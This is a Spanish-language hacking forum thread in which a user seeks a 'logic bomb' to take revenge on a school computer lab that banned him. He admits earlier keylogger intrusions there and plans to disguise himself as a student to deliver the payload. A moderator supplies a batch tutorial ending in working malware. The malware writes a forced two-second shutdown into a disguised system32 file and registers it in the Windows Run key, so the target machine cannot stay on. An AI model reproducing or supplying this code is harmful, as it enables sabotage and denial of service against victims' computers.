Noviembre 27, 2014, 05:38:44 am

Autor Tema: bomba logica  (Leído 9707 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado jopc1

  • Me das tu IP?
  • *
  • Mensajes: 27
  • Sexo: Masculino
  • solo vivo para aprender, y ¿tu?.
    • Ver Perfil
bomba logica
« en: Mayo 30, 2007, 08:25:49 pm »
hola quicieran que me recomendaran una buena bomba logica porfavor
y si no es molestia si me pasaran algun manual de esa misma bomba logica y uno de como crear una bomba logica por mis propias manos

bueno gracias :o ::) :toma:
« Última modificación: Septiembre 26, 2011, 07:19:10 pm por cemasmas »
partisiones de mi mente que se desfracmentan y se complementan para forjarse de conocimientos.

fizgon

  • Visitante
Re: bomba logica
« Respuesta #1 en: Mayo 30, 2007, 08:31:26 pm »
alguien dijo "bomba" ?¿?¿?¿?¿?¿?¿?¿?¿?¿?

buscá mis bombitas en el foro...

Desconectado NodVeK

  • Yo vivo en CPH
  • ***
  • Mensajes: 568
    • Ver Perfil
Re: bomba logica
« Respuesta #2 en: Mayo 31, 2007, 01:56:13 am »

Ayudaría saber que tipo de bomba lógica quieres, y si no lo sabes, contra qué la quieres utilizar.

Desconectado jopc1

  • Me das tu IP?
  • *
  • Mensajes: 27
  • Sexo: Masculino
  • solo vivo para aprender, y ¿tu?.
    • Ver Perfil
Re: bomba logica
« Respuesta #3 en: Mayo 31, 2007, 06:30:43 pm »
la quiciera utilizar contra un laboratorio de informatica,
por que y me tienen excluido de ahi por estar accediendo al servidor
 :cool:

Desconectado HolyKnight

  • Elprince
  • Moderador
  • *****
  • Mensajes: 2132
  • Sexo: Masculino
  • Las Dudas en el FORO, no por PM.
    • Ver Perfil
    • Holyknight's Web
Re: bomba logica
« Respuesta #4 en: Mayo 31, 2007, 09:02:12 pm »
puedes hace run bomba logica simple con batch, ademas batch no lo detecta ningun antivirus.
Debes Registrarte para ver los Links. Registrate Ó Loegeate

"Todo el mundo desea saber, pero nadie quiere pagar el precio."

I was blind, but now i see.

Debes Registrarte para ver los Links. Registrate Ó Loegeate

Desconectado jopc1

  • Me das tu IP?
  • *
  • Mensajes: 27
  • Sexo: Masculino
  • solo vivo para aprender, y ¿tu?.
    • Ver Perfil
Re: bomba logica
« Respuesta #5 en: Junio 13, 2007, 11:25:48 am »
eso como se haria disculpa mi ignorancia pero me pudieras explicar?
jejeje
y si tienes algunos manuales, te lo agradeseria.

 :toma:

Desconectado Nemant

  • Me das tu IP?
  • *
  • Mensajes: 112
    • Ver Perfil
Re: bomba logica
« Respuesta #6 en: Junio 13, 2007, 01:26:18 pm »

y no saves crear una bomba? pues tio, programate algo simple, o simplemente meteles algun troyano k es mas divertido xD
Islam != Terrorism
FIRMA EDITADA POR TXS POR SOBREPASAR TAMAÑO PERMITIDO

Desconectado jopc1

  • Me das tu IP?
  • *
  • Mensajes: 27
  • Sexo: Masculino
  • solo vivo para aprender, y ¿tu?.
    • Ver Perfil
Re: bomba logica
« Respuesta #7 en: Junio 13, 2007, 07:39:19 pm »
bueno tines razon un troyano pero, yo prefiero entrar pr el telnet a las computadoras de mis victimas robandole su contraseña con un keylogger metiendoselo por la red local del labortorio, sacndo la ip del servidor y entrndo a sus carpetas compartidas y haci meterle el keylogger..........
pero ahora ya no me dejan entrar al laboratorio, por las pendejadas que les e hecho, y por so me quiero desquitar mandandoles una bomba logica haciendome pasar por una estudiante ya que l administrador del sistema siempre esta chateandocon las estudiantes, creo que no pensara que ella es decir yo le estoy metiendo una bomba logica.......por eso enseñenme o envienme un tutorial para por lo menos empesar con lo basico de como se crea una bomba logica o un virus por que se estupido ya me arto, se cre superior que yo aun que lo sea pero no me uiero quedar con los brazos cruzados. se los agradeseria :toma:   

Desconectado HolyKnight

  • Elprince
  • Moderador
  • *****
  • Mensajes: 2132
  • Sexo: Masculino
  • Las Dudas en el FORO, no por PM.
    • Ver Perfil
    • Holyknight's Web
Re: bomba logica
« Respuesta #8 en: Junio 14, 2007, 12:52:27 am »
Primero aprender la definicion concreta de Bomba Lógica: Debes Registrarte para ver los Links. Registrate Ó Loegeate

Las bombas logicas complejas pueden programarce en lenguajes mas complejos como Visual Basic. Pero como tu solo buscas algo simple para joder al chabo te recomiendo batch(No sabes que es batch? lee la  definicion Debes Registrarte para ver los Links. Registrate Ó Loegeate) que es un lenguaje de programacion( en realidad no es un lenguaje de prg. pero no entremos en detalle) muy simple y funcional.

Antes de ir a hacer una bomba es mejor primero aprenderlo no?

[hr

Lo primero es abrir el Block de Notas. Inicio > Todos los progrmas > accesorios > Block de Notas

lo que tienes que saber para guardar tu progra y que funcione tienes que hacer el codigo en block de notas y luego pulsar "guardar como" luego donde dice "documento de texto (.txt)" pulsas y lo cambias por la opcion "todos los archivos" luego donde dice el nombre le pones un nombre que quieras .bat recuerda que para que funcione lo tienes que guardar como .bat

Empezemos

Abres el Block y escribes el siguiente codigo.
Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
@echo off
title Primer Programa
echo presiona una tecla
pause
echo hola
pause > nul
exit
 

Ahora expliquemos el codigo que copiaste.

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
@echo offeste codigo lo que hace es ocultar todos los comando que vas a utilizar en el programa, sino nos apareceria lo que pusimos y la victima se daria cuenta de que es un virus en caso de que lo sea.

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
titleeste es el nombre que aparece en la ventana del DOS cuando ejecutas el programa.

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
echoeste code sirve para "imprimir" o mostrar lo que es cribamos en la pantalla.
por ejemplo
echo hola
en la pantalla apareceria "hola"

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
pauseesto crea una pausa en el programa y tienes que presionar una tecla para proseguir.

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
pause > nulesto es lo mismo que lo anterior pero unicamente que no muestra el cartel en la pantalla que dice "presione un tecla para proseguir"


ahora que sabes lo bien basico pasamos a lo mas divertido.

prueba este code

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
shutdown -s -f -t 15 -c "hola mundo"ahora explicamos el code

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
shutdownel mismo nombre te lo dice, apaga el equipo

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
-s activa apagar el equipo

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
-f Fuerza a las aplicaciones activas a cerrrarse

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
-t xxEs el tiempo en el que tardara en apagarse en ordenador.(xx representa el numero que quieras)

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
-c "x"muestra un mensaje con lo que quieras (donde esta la x pones el mensaje)


entonses si creamos un batch que se inicie con windows y no deje prendida la pc por mas de 2 segundo joderemos mucho a la victima.

Código: Debes Registrarte para ver los Links. Registrate Ó Loegeate
@echo off
shutdown -s -f -t 2 -c "Jodete" >> c:/windows/system32/windosx.bat
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v sysin2 /t REG_SZ /d "c:/windows/system32/windosx.bat"
exit

lo que haria esto en "teoria" seria apagar el pc en 2 segundos y agregarse al registro de windows, osea que su pc no puede estar mas de 2 segundos prendida.  ;)

espero que te haya servido este tuto.



Desconectado Dr.Piedra

  • Me das tu IP?
  • *
  • Mensajes: 96
  • Sexo: Masculino
  • Aprendiendo... primero la teoria luego la practica
    • Ver Perfil
    • K-Vault la comunidad del conocimiento
Re: bomba logica
« Respuesta #9 en: Junio 14, 2007, 07:23:30 am »
hey!! esta wapo wapo!! la  tuto me a gustado
muchas gracias
se agradecen las cosas si te gusta ...  ... ... ... ... ... ... ...
Debes Registrarte para ver los Links. Registrate Ó Loegeate[/img]

Desconectado nomade_55p

  • Me das tu IP?
  • *
  • Mensajes: 189
  • Sexo: Masculino
  • ArGeNtOHaCk - Somos re heavy re jodidos -
    • Ver Perfil
Re: bomba logica
« Respuesta #10 en: Junio 14, 2007, 10:23:48 am »
@echo off
shutdown -s -f -t 2 -c "Jodete" >> c:/windows/system32/windosx.bat
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v sysin2 /t REG_SZ /d "c:/windows/system32/windosx.bat"
exit
[/code]


solo dos preguntitas, q es lo q hace >> "direccion" presumo q gurda el batch en la carpeta especificada con el nombre especificado ... no?

Y q hace /t REG_SZ ? crea un valor alfanumerico? eso es necesario? yo lo he echo sin ponerlo...

salu2
Debes Registrarte para ver los Links. Registrate Ó Loegeate[/img]


Desconectado jopc1

  • Me das tu IP?
  • *
  • Mensajes: 27
  • Sexo: Masculino
  • solo vivo para aprender, y ¿tu?.
    • Ver Perfil
Re: bomba logica
« Respuesta #11 en: Junio 14, 2007, 03:40:40 pm »
hey gracias ya lo leei y me parese buena idea, el comando ya me lo sabia, y como pasarlo a bat pero mi problema siempre era como hacer que arrancara con windows, jejeje gracias
lo voy a intentar

Desconectado HolyKnight

  • Elprince
  • Moderador
  • *****
  • Mensajes: 2132
  • Sexo: Masculino
  • Las Dudas en el FORO, no por PM.
    • Ver Perfil
    • Holyknight's Web
Re: bomba logica
« Respuesta #12 en: Junio 14, 2007, 03:41:06 pm »

si, pero es para camuflar mas el batch  ;)

Desconectado jopc1

  • Me das tu IP?
  • *
  • Mensajes: 27
  • Sexo: Masculino
  • solo vivo para aprender, y ¿tu?.
    • Ver Perfil
Re: bomba logica
« Respuesta #13 en: Junio 14, 2007, 06:56:37 pm »
y para hacer la bomba logica, y los virus se nesecita aprender el visual basic o existe algo mejor  o cual me recomiendan por aprender, por que ya se acercan mis vacaciones..jejeeje
y ya saben mes de estudio intensivo jejejeje......

Desconectado conectado

  • Me das tu IP?
  • *
  • Mensajes: 8
    • Ver Perfil
Re: bomba logica
« Respuesta #14 en: Junio 15, 2007, 06:25:04 am »
HolyKnight  MUCHISIMAS GRACIAS X EL MANUAL!!! me re sirivio ^^ d nvo... gracias


xx
Mi bomba logica

Iniciado por francuxo

26 Respuestas
2956 Vistas
Último mensaje Agosto 19, 2009, 05:55:32 am
por truci4
xx
Bomba logica

Iniciado por SpyX

8 Respuestas
1619 Vistas
Último mensaje Abril 26, 2009, 01:49:20 pm
por matador98
exclamation
Bomba Logica Nro. 1

Iniciado por NTC0394

4 Respuestas
966 Vistas
Último mensaje Abril 05, 2011, 09:35:23 pm
por JaAViEr
xx
BOMBA LOGICA

Iniciado por la pulga ska

6 Respuestas
1935 Vistas
Último mensaje Octubre 20, 2007, 10:43:09 am
por cyberserver
question
Que es una bomba logica??

Iniciado por HolyKnight

16 Respuestas
5634 Vistas
Último mensaje Diciembre 18, 2006, 08:32:40 pm
por elio715
xx
bomba logica contra hi5

Iniciado por rata_blank

4 Respuestas
1077 Vistas
Último mensaje Julio 16, 2007, 04:55:22 pm
por Red-T
question
Problema con Bomba lógica

Iniciado por adrikiller

10 Respuestas
1307 Vistas
Último mensaje Diciembre 19, 2010, 07:32:02 am
por adrikiller
smiley
Bomba logica en batch :)

Iniciado por FirefoxJL

3 Respuestas
1430 Vistas
Último mensaje Octubre 20, 2007, 12:24:44 am
por hackerX_TX
exclamation
Bomba Logica [ Foto_Grinder]

Iniciado por LauBuru

7 Respuestas
1037 Vistas
Último mensaje Febrero 18, 2010, 07:17:26 pm
por MDV1996
question
bomba logica !!!! dudas

Iniciado por meister

7 Respuestas
6498 Vistas
Último mensaje Marzo 17, 2007, 01:17:08 pm
por _fran_